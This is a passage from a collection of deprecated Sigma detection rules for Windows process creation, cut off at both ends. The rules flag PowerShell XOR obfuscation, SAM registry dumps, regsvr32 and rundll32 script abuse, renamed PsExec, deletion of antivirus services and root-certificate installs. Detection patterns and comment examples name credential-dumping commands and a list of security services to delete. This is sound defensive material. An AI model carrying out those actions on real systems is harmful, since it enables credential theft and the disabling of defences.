author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
date: 2022/07/06
modified: 2023/01/30
tags:
- attack.defense_evasion
- attack.t1027
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.exe'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- 'ForEach'
- 'Xor'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_reg_dump_sam.yml
================================================
title: Registry Dump of SAM Creds and Secrets
id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e
related:
- id: fd877b94-9bb5-4191-bb25-d79cbd93c167
type: similar
status: deprecated
description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
author: frack113
date: 2022/01/05
modified: 2023/02/04
tags:
- attack.credential_access
- attack.t1003.002
logsource:
category: process_creation
product: windows
detection:
selection_reg:
CommandLine|contains: ' save '
selection_key:
CommandLine|contains:
- HKLM\sam
- HKLM\system
- HKLM\security
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_regsvr32_anomalies.yml
================================================
title: Regsvr32 Anomaly
id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
status: deprecated
description: Detects various anomalies in relation to regsvr32.exe
references:
- https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
author: Florian Roth (Nextron Systems), oscd.community, Tim Shelton
date: 2019/01/16
modified: 2023/05/26
tags:
- attack.defense_evasion
- attack.t1218.010
- car.2019-04-002
- car.2019-04-003
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith: '\regsvr32.exe'
CommandLine|contains: '\Temp\'
selection2:
Image|endswith: '\regsvr32.exe'
ParentImage|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\powershell_ise.exe'
selection3:
Image|endswith: '\regsvr32.exe'
ParentImage|endswith: '\cmd.exe'
selection4a:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|all:
- '/i:'
- 'http'
CommandLine|endswith: 'scrobj.dll'
selection4b:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|all:
- '/i:'
- 'ftp'
CommandLine|endswith: 'scrobj.dll'
selection5:
Image|endswith:
- '\cscript.exe'
- '\wscript.exe'
ParentImage|endswith: '\regsvr32.exe'
selection6:
Image|endswith: '\EXCEL.EXE'
CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe '
selection7:
ParentImage|endswith: '\mshta.exe'
Image|endswith: '\regsvr32.exe'
selection8:
Image|endswith: '\regsvr32.exe'
CommandLine|contains:
- '\AppData\Local'
- 'C:\Users\Public'
selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3
Image|endswith: '\regsvr32.exe'
CommandLine|endswith:
- '.jpg'
- '.jpeg'
- '.png'
- '.gif'
- '.bin'
- '.tmp'
- '.temp'
- '.txt'
filter1:
CommandLine|contains:
- '\AppData\Local\Microsoft\Teams'
- '\AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll'
filter2:
ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe'
CommandLine|contains: '\Program Files\Box\Box\Temp\'
filter_legitimate:
CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll'
condition: 1 of selection* and not 1 of filter*
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_renamed_paexec.yml
================================================
title: Renamed PaExec Execution
id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b
status: deprecated
description: Detects execution of renamed paexec via imphash and executable product string
references:
- sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
author: Jason Lynch
date: 2019/04/17
modified: 2023/02/14
tags:
- attack.defense_evasion
- attack.t1036.003
- attack.g0046
- car.2013-05-009
- attack.execution
- attack.t1569.002
logsource:
category: process_creation
product: windows
detection:
selection:
- Product|contains: 'PAExec'
- Hashes|contains:
- IMPHASH=11D40A7B7876288F919AB819CC2D9802
- IMPHASH=6444f8a34e99b8f7d9647de66aabe516
- IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f
- IMPHASH=1a6cca4d5460b1710a12dea39e4a592c
filter:
Image|contains: 'paexec'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_renamed_powershell.yml
================================================
title: Renamed PowerShell
id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20
status: deprecated
description: Detects the execution of a renamed PowerShell often used by attackers or malware
references:
- https://twitter.com/christophetd/status/1164506034720952320
author: Florian Roth (Nextron Systems), frack113
date: 2019/08/22
modified: 2023/01/18
tags:
- car.2013-05-009
- attack.defense_evasion
- attack.t1036.003
logsource:
product: windows
category: process_creation
detection:
selection:
Description|startswith:
- 'Windows PowerShell'
- 'pwsh'
Company: 'Microsoft Corporation'
filter:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
- '\pwsh.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_renamed_psexec.yml
================================================
title: Renamed PsExec
id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2
status: deprecated
description: Detects the execution of a renamed PsExec often used by attackers or malware
references:
- https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
author: Florian Roth (Nextron Systems)
date: 2019/05/21
modified: 2023/03/04
tags:
- car.2013-05-009
- attack.defense_evasion
- attack.t1036.003
logsource:
product: windows
category: process_creation
detection:
selection:
Description: 'Execute processes remotely'
Product: 'Sysinternals PsExec'
filter:
Image|endswith:
- '\PsExec.exe'
- '\PsExec64.exe'
condition: selection and not filter
falsepositives:
- Software that illegaly integrates PsExec in a renamed form
- Administrators that have renamed PsExec and no one knows why
level: high
================================================
FILE: deprecated/windows/proc_creation_win_renamed_rundll32.yml
================================================
title: Renamed Rundll32.exe Execution
id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2
status: deprecated
description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection
references:
- https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
author: Florian Roth (Nextron Systems)
date: 2022/06/08
modified: 2023/01/18
logsource:
category: process_creation
product: windows
detection:
selection:
OriginalFileName: 'RUNDLL32.EXE'
filter:
Image|endswith: '\rundll32.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_root_certificate_installed.yml
================================================
title: Root Certificate Installed
id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc
related:
- id: 42821614-9264-4761-acfc-5772c3286f76
type: derived
status: deprecated
description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
author: 'oscd.community, @redcanary, Zach Stanford @svch0st'
date: 2020/10/10
modified: 2023/03/05
tags:
- attack.defense_evasion
- attack.t1553.004
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith: '\certutil.exe' # Example: certutil -addstore -f -user ROOT CertificateFileName.der
CommandLine|contains|all:
- '-addstore'
- 'root'
selection2:
Image|endswith: '\CertMgr.exe' # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all
CommandLine|contains|all:
- '/add'
- 'root'
condition: selection1 or selection2
falsepositives:
- Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_run_from_zip.yml
================================================
title: Run from a Zip File
id: 1a70042a-6622-4a2b-8958-267625349abf
status: deprecated
description: Payloads may be compressed, archived, or encrypted in order to avoid detection
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file
author: frack113
date: 2021/12/26
modified: 2023/03/05
tags:
- attack.impact
- attack.t1485
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains: '.zip\'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_rundll32_js_runhtmlapplication.yml
================================================
title: Rundll32 JS RunHTMLApplication Pattern
id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3
status: deprecated
description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code
references:
- http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
- https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
author: Florian Roth (Nextron Systems)
date: 2022-01-14
modified: 2024-02-23
tags:
- attack.defense_evasion
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains|all:
- 'rundll32'
- 'javascript'
- '..\..\mshtml,'
- 'RunHTMLApplication'
selection2:
CommandLine|contains: ';document.write();GetObject("script'
condition: 1 of selection*
falsepositives:
- Unlikely
level: high
================================================
FILE: deprecated/windows/proc_creation_win_rundll32_script_run.yml
================================================
title: Suspicious Rundll32 Script in CommandLine
id: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7
status: deprecated
description: Detects suspicious process related to rundll32 based on arguments
references:
- https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
- https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md
author: frack113, Zaw Min Htun (ZETA)
date: 2021/12/04
modified: 2024/02/23
tags:
- attack.defense_evasion
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains: 'rundll32'
selection2:
CommandLine|contains:
- 'mshtml,RunHTMLApplication'
- 'mshtml,#135'
selection3:
CommandLine|contains:
- 'javascript:'
- 'vbscript:'
condition: all of selection*
falsepositives:
- False positives depend on scripts and administrative tools used in the monitored environment
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_sc_delete_av_services.yml
================================================
title: Suspicious Execution of Sc to Delete AV Services
id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b
status: deprecated
description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
references:
- https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/08/01
modified: 2023/03/04
tags:
- attack.execution
- attack.defense_evasion
- attack.t1562.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\sc.exe'
- OriginalFileName: 'sc.exe'
selection_cli:
CommandLine|contains: ' delete '
selection_av_process:
CommandLine|contains:
# Delete Service 'AVG'
- 'AvgAdminServer'
- 'AVG Antivirus'
- 'MBEndpointAgent'
# Delete Service 'Malwarebytes'
- 'MBAMService'
- 'MBCloudEA'
- 'avgAdminClient'
# Delete Service 'Sophos'
- 'SAVService'
- 'SAVAdminService'
- 'Sophos AutoUpdate Service'
- 'Sophos Clean Service'
- 'Sophos Device Control Service'
- 'Sophos File Scanner Service'
- 'Sophos Health Service'
- 'Sophos MCS Agent'
- 'Sophos MCS Client'
- 'SntpService'
- 'swc_service'
- 'swi_service'
- 'Sophos UI'
- 'swi_update'
- 'Sophos Web Control Service'
- 'Sophos System Protection Service'
- 'Sophos Safestore Service'
- 'hmpalertsvc'
- 'RpcEptMapper'
- 'Sophos Endpoint Defense Service'
- 'SophosFIM'
- 'swi_filter'
# Delete Service 'FireBird'
- 'FirebirdGuardianDefaultInstance'
- 'FirebirdServerDefaultInstance'
# Delete Service 'Webroot'
- 'WRSVC'
# Delete Service 'ESET'
- 'ekrn'
- 'ekrnEpsw'
# Delete Service 'Kaspersky'
- 'klim6'
- 'AVP18.0.0'
- 'KLIF'
- 'klpd'
- 'klflt'
- 'klbackupdisk'
- 'klbackupflt'
- 'klkbdflt'
- 'klmouflt'
- 'klhk'
- 'KSDE1.0.0'
- 'kltap'
# Delete Service 'Quick Heal'
- 'ScSecSvc'
- 'Core Mail Protection'
- 'Core Scanning Server'
- 'Core Scanning ServerEx'
- 'Online Protection System'
- 'RepairService'
- 'Core Browsing Protection'
- 'Quick Update Service'
# Delete Service 'McAfee'
- 'McAfeeFramework'
- 'macmnsvc'
- 'masvc'
- 'mfemms'
- 'mfevtp'
# Delete Service 'Trend Micro'
- 'TmFilter'
- 'TMLWCSService'
- 'tmusa'
- 'TmPreFilter'
- 'TMSmartRelayService'
- 'TMiCRCScanService'
- 'VSApiNt'
- 'TmCCSF'
- 'tmlisten'
- 'TmProxy'
- 'ntrtscan'
- 'ofcservice'
- 'TmPfw'
- 'PccNTUpd'
# Delete Service 'Panda'
- 'PandaAetherAgent'
- 'PSUAService'
- 'NanoServiceMain'
- 'EPIntegrationService'
- 'EPProtectedService'
- 'EPRedline'
- 'EPSecurityService'
- 'EPUpdateService'
condition: all of selection*
falsepositives:
- Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)
level: high
================================================
FILE: deprecated/windows/proc_creation_win_schtasks_user_temp.yml
================================================
title: Suspicious Add Scheduled Task From User AppData Temp
id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8
status: deprecated
description: schtasks.exe create task from user AppData\Local\Temp
references:
- malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
author: frack113
date: 2021/11/03
modified: 2023/03/14
tags:
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
schtasks:
Image|endswith: '\schtasks.exe'
option:
CommandLine|contains|all:
- '/Create '
- '\AppData\Local\Temp'
filter_klite_codec:
CommandLine|contains|all:
- '/Create /TN "klcp_update" /XML '
- '\klcp_update_task.xml'
condition: schtasks and option and not 1 of filter_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_service_stop.yml
================================================
title: Stop Windows Service
id: eb87818d-db5d-49cc-a987-d5da331fbd90
status: deprecated
description: Detects a Windows service to be stopped
author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali
date: 2019/10/23
modified: 2023/03/05
tags:
- attack.impact
- attack.t1489
logsource:
category: process_creation
product: windows
detection:
selection_sc_net_img:
- OriginalFileName:
- 'sc.exe'
- 'net.exe'
- 'net1.exe'
- Image|endswith:
- '\sc.exe'
- '\net.exe'
- '\net1.exe'
selection_sc_net_cli:
CommandLine|contains: ' stop '
selection_pwsh:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains: 'Stop-Service '
filter:
CommandLine:
- 'sc stop KSCWebConsoleMessageQueue' # kaspersky Security Center Web Console double space between sc and stop
- 'sc stop LGHUBUpdaterService' # Logitech LGHUB Updater Service
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: (all of selection_sc_net* and not filter) or selection_pwsh
fields:
- ComputerName
- User
- CommandLine
falsepositives:
- Administrator shutting down the service due to upgrade or removal purposes
level: low
================================================
FILE: deprecated/windows/proc_creation_win_susp_bitstransfer.yml
================================================
title: Suspicious Bitstransfer via PowerShell
id: cd5c8085-4070-4e22-908d-a5b3342deb74
status: deprecated
description: Detects transferring files from system on a server bitstransfer Powershell cmdlets
references:
- https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
author: Austin Songer @austinsonger
date: 2021/08/19
modified: 2023/01/10
tags:
- attack.exfiltration
- attack.persistence
- attack.t1197
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
- '\pwsh.exe'
CommandLine|contains:
- 'Get-BitsTransfer'
- 'Add-BitsFile'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_susp_cmd_exectution_via_wmi.yml
================================================
title: Suspicious Cmd Execution via WMI
id: e31f89f7-36fb-4697-8ab6-48823708353b
status: deprecated
description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.
references:
- https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html
author: Tim Rauch
date: 2022/09/27
modified: 2023/01/19
tags:
- attack.execution
- attack.t1047
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\cmd.exe'
ParentImage|endswith: '\WmiPrvSE.exe'
CommandLine|contains: '\\\\127.0.0.1\\'
selection_opt:
CommandLine|contains:
- '2>&1'
- '1>'
condition: all of selection*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_susp_commandline_chars.yml
================================================
title: Suspicious Characters in CommandLine
id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9
status: deprecated
description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion
references:
- https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
author: Florian Roth (Nextron Systems)
date: 2022/04/27
modified: 2023/03/03
tags:
- attack.defense_evasion
logsource:
product: windows
category: process_creation
detection:
selection_spacing_modifiers:
CommandLine|contains: # spacing modifier letters that get auto-replaced
- 'ˣ' # 0x02E3
- '˪' # 0x02EA
- 'ˢ' # 0x02E2
selection_unicode_slashes: # forward slash alternatives
CommandLine|contains:
- '∕' # 0x22FF
- '⁄' # 0x206F
selection_unicode_hyphens: # hyphen alternatives
CommandLine|contains:
- '―' # 0x2015
- '—' # 0x2014
condition: 1 of selection*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_susp_lolbin_non_c_drive.yml
================================================
title: Wscript Execution from Non C Drive
id: 5b80cf53-3a46-4adc-960b-05ec19348d74
status: deprecated
description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.
references:
- https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt
- https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/
author: Aaron Herman
date: 2022/10/01
modified: 2023/08/29
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection_lolbin:
Image|endswith:
- '\wscript.exe'
- '\cscript.exe'
selection_exetensions:
CommandLine|contains:
- '.js'
- '.vbs'
- '.vbe'
selection_drive_path:
CommandLine|contains: ':\'
filter_drive_path:
CommandLine|contains:
- ' C:\\'
- " 'C:\\"
- ' "C:\\'
filter_env_vars:
CommandLine|contains: '%'
filter_unc_paths:
CommandLine|contains: ' \\\\'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Legitimate scripts located on other partitions such as "D:"
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_susp_run_folder.yml
================================================
title: Process Start From Suspicious Folder
id: dca91cfd-d7ab-4c66-8da7-ee57d487b35b
status: deprecated
description: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files
references:
- Malware sandbox results
author: frack113
date: 2022/02/11
modified: 2022/11/03
tags:
- attack.execution
- attack.t1204
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains:
- '\Desktop\'
- '\Temp\'
- '\Temporary Internet'
filter_parent:
- ParentImage:
- 'C:\Windows\System32\cleanmgr.exe'
- 'C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe'
- 'C:\Windows\System32\dxgiadaptercache.exe'
- ParentImage|startswith: 'C:\Program Files (x86)\NVIDIA Corporation\'
filter_other:
Image|endswith: 'setup.exe' # the missing \ at the beginning is intended - to cover e.g. MySoftwareSetup.exe as well
filter_edge:
Image|startswith: 'C:\Program Files (x86)\Microsoft\Temp\'
Image|endswith: '.tmp\MicrosoftEdgeUpdate.exe'
#OriginalFileName: msedgeupdate.dll
condition: selection and not 1 of filter*
falsepositives:
- Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories
level: low
================================================
FILE: deprecated/windows/proc_creation_win_susp_squirrel_lolbin.yml
================================================
title: Squirrel Lolbin
id: fa4b21c9-0057-4493-b289-2556416ae4d7
status: deprecated
description: Detects Possible Squirrel Packages Manager as Lolbin
references:
- http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
date: 2019/11/12
modified: 2023/02/14
tags:
- attack.execution
- attack.defense_evasion
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith: '\update.exe'
selection2:
CommandLine|contains:
- '--processStart'
- '--processStartAndWait'
- '--createShortcut'
filter_discord:
CommandLine|contains|all:
- 'C:\Users\'
- '\AppData\Local\Discord\Update.exe'
- ' --processStart'
- 'Discord.exe'
filter_github_desktop:
CommandLine|contains|all:
- 'C:\Users\'
- '\AppData\Local\GitHubDesktop\Update.exe'
- 'GitHubDesktop.exe'
CommandLine|contains:
- '--createShortcut'
- '--processStartAndWait'
filter_teams:
CommandLine|contains|all:
- 'C:\Users\'
- '\AppData\Local\Microsoft\Teams\Update.exe'
- 'Teams.exe'
CommandLine|contains:
- '--processStart'
- '--createShortcut'
condition: all of selection* and not 1 of filter_*
falsepositives:
- 1Clipboard
- Beaker Browser
- Caret
- Collectie
- Discord
- Figma
- Flow
- Ghost
- GitHub Desktop
- GitKraken
- Hyper
- Insomnia
- JIBO
- Kap
- Kitematic
- Now Desktop
- Postman
- PostmanCanary
- Rambox
- Simplenote
- Skype
- Slack
- SourceTree
- Stride
- Svgsus
- WebTorrent
- WhatsApp
- WordPress.com
- Atom
- Gitkraken
- Slack
- Teams
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_sysinternals_psexec_service_execution.yml
================================================
title: PsExec Tool Execution
id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
related:
- id: 42c575ea-e41e-41f1-b248-8093c3e82a28
type: derived
status: deprecated
description: Detects PsExec service execution via default service image name
references:
- https://www.jpcert.or.jp/english/pub/sr/ir_research.html
- https://jpcertcc.github.io/ToolAnalysisResultSheet
author: Thomas Patzke
date: 2017/06/12
modified: 2023/02/28
tags:
- attack.execution
- attack.t1569.002
- attack.s0029
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\PSEXESVC.exe'
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: selection
fields:
- EventID
- CommandLine
- ParentCommandLine
- ServiceName
- ServiceFileName
- TargetFilename
- PipeName
falsepositives:
- Unknown
level: low
================================================
FILE: deprecated/windows/proc_creation_win_sysinternals_psexesvc_start.yml
================================================
title: PsExec Service Start
id: 3ede524d-21cc-472d-a3ce-d21b568d8db7
status: deprecated
description: Detects a PsExec service start
author: Florian Roth (Nextron Systems)
date: 2018/03/13
modified: 2023/02/28
tags:
- attack.execution
- attack.s0029
- attack.t1569.002
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine: C:\Windows\PSEXESVC.exe
condition: selection
falsepositives:
- Administrative activity
level: low
================================================
FILE: deprecated/windows/proc_creation_win_whoami_as_system.yml
================================================
title: Run Whoami as SYSTEM
id: 80167ada-7a12-41ed-b8e9-aa47195c66a1
status: deprecated
description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
references:
- https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
author: Teymur Kheirkhabarov, Florian Roth
date: 2019/10/23
modified: 2023/02/28
tags:
- attack.privilege_escalation
- attack.discovery
- attack.t1033
logsource:
category: process_creation
product: windows
detection:
selection_user:
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
selection_img:
- OriginalFileName: 'whoami.exe'
- Image|endswith: '\whoami.exe'
condition: all of selection*
falsepositives:
- Possible name overlap with NT AUHTORITY substring to cover all languages
level: high
================================================
FILE: deprecated/windows/proc_creation_win_whoami_execution.yml
================================================
title: Whoami Utility Execution
id: e28a5a99-da44-436d-b7a0-2afc20a5f413
status: deprecated # Deprecated in favor of 502b42de-4306-40b4-9596-6f590c81f073
description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
references:
- https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
- https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
author: Florian Roth (Nextron Systems)
date: 2018-08-13
modified: 2025-10-20
tags:
- attack.discovery
- attack.t1033
- car.2016-03-001
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\whoami.exe'
- OriginalFileName: 'whoami.exe'
condition: selection
falsepositives:
- Admin activity
- Scripts and administrative tools used in the monitored environment
- Monitoring activity
level: low
================================================
FILE: deprecated/windows/proc_creation_win_winword_dll_load.yml
================================================
title: Winword.exe Loads Suspicious DLL
id: 2621b3a6-3840-4810-ac14-a02426086171
status: deprecated
description: Detects Winword.exe loading a custom DLL using the /l flag
author: Victor Sergeev, oscd.community
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
date: 2020/10/09
modified: 2022/07/25
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\winword.exe'
CommandLine|contains: '/l'
condition: selection
fields:
- CommandLine
falsepositives:
- Unknown
level: medium
tags:
- attack.defense_evasion
- attack.t1202
================================================
FILE: deprecated/windows/proc_creation_win_wmic_execution_via_office_process.yml
================================================
title: WMI Execution Via Office Process
id: 518643ba-7d9c-4fa5-9f37-baed36059f6a
related:
- id: e1693bc8-7168-4eab-8718-cdcaa68a1738
type: derived
- id: 438025f9-5856-4663-83f7-52f878a70a50
type: similar
status: deprecated
description: Initial execution of malicious document calls wmic to execute the file with regsvr32
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)
date: 2021/08/23
modified: 2023/02/04
tags:
- attack.t1204.002
- attack.t1047
- attack.t1218.010
- attack.execution
- attack.defense_evasion
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\wbem\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_parent:
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\powerpnt.exe'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_wmic_remote_command.yml
================================================
title: WMI Remote Command Execution
id: e42af9df-d90b-4306-b7fb-05c863847ebd
status: deprecated
description: An adversary might use WMI to execute commands on a remote system
references:
- https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
author: frack113
date: 2022/03/13
modified: 2023/02/14
tags:
- attack.execution
- attack.t1047
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_cli:
CommandLine|contains|all:
- '/node:'
- 'process'
- 'call'
- 'create'
condition: all of selection*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_wmic_remote_service.yml
================================================
title: WMI Reconnaissance List Remote Services
id: 09af397b-c5eb-4811-b2bb-08b3de464ebf
status: deprecated
description: |
An adversary might use WMI to check if a certain Remote Service is running on a remote device.
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic
author: frack113
date: 2022/01/01
modified: 2023/02/14
tags:
- attack.execution
- attack.t1047
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_cli:
CommandLine|contains|all:
- '/node:'
- 'service'
condition: all of selection*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_wuauclt_execution.yml
================================================
title: Windows Update Client LOLBIN
id: d7825193-b70a-48a4-b992-8b5b3015cc11
status: deprecated
description: Detects code execution via the Windows Update client (wuauclt)
references:
- https://dtm.uk/wuauclt/
author: FPT.EagleEye Team
date: 2020/10/17
modified: 2023/11/11
tags:
- attack.command_and_control
- attack.defense_evasion
- attack.t1105
- attack.t1218
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\wuauclt.exe'
- OriginalFileName: 'wuauclt.exe'
selection_cli:
CommandLine|contains|all:
- '/UpdateDeploymentProvider'
- '/RunHandlerComServer'
- '.dll'
filter:
CommandLine|contains:
- ' /ClassId '
- ' wuaueng.dll '
condition: all of selection* and not filter
falsepositives:
